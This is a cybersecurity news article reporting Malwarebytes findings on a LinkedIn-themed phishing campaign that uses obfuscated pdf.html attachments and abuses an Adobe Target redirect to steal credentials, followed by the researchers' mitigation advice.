Fake LinkedIn Collaboration Emails Abuse Adobe Target to Track Victims in Phishing Campaign
Published
Key Takeaways
- Deceptive Tactics: Cybercriminals abuse Adobe infrastructure to harvest LinkedIn credentials.
- Malicious Attachments: Fake contract files use double extensions and obfuscated JavaScript.
- Victim Tracking: A domain associated with the Adobe Target A/B testing platform is being abused for redirection and to track compromised users.
A LinkedIn-themed phishing campaign, initiated via emails posing as business inquiries with an attached PDF, is abusing Adobe infrastructure as a redirect/abuse technique. This operation steals user passwords and subsequently redirects victims to the legitimate LinkedIn site to avoid detection.
Adobe Target A/B Testing Abuse
The phishing attack begins with an email that masquerades as a standard business inquiry sent via LinkedIn, Malwarebytes researchers have discovered. Threat actors include a fake contract attachment that appears to be a PDF but uses a deceptive double file extension, pdf.html.
The attached file is a highly obfuscated HTML document. When a user opens the attachment, they see a fake login form where the target email address is hardcoded. The operation leverages an Adobe Target URL, which attackers abuse as a redirect point to track victims.
Once the victim interacts with the page, the submitted credentials are sent directly to a PHP file hosted on a Russian domain. The user is then seamlessly redirected to the real LinkedIn domain.
Red Flags and Mitigation
Malwarebytes researchers identified several other red flags within these communications. The sender's name, email address, and email signature do not match. While the sender's company actually exists, it is not located in the U.S., and the sender's name belongs to a real person, but that individual does not work at the specified company.
Beyond avoiding unsolicited attachments, Malwarebytes advice includes:
- Only access your accounts through official apps or by typing the official website directly into your browser.
- Check file extensions carefully.
- Enable multi-factor authentication (MFA) for your critical accounts.
- Use an up-to-date, real-time anti-malware solution with a web protection module.
This month, a phishing campaign impersonating the U.S. Social Security Administration targeted 80+ organizations. A March Cofense report said attackers are leveraging convincing LinkedIn’s notification system alerts to steal user credentials.
Early this year, Lazarus Group attempted to scam developers via fake LinkedIn jobs that redirected to malware-infected websites.
Related
Get expert insights on threats, breaches, scams, and security trends — delivered every Monday.
Most Popular
Get expert insights on threats, breaches, scams, and security trends — delivered every Monday.
Most Popular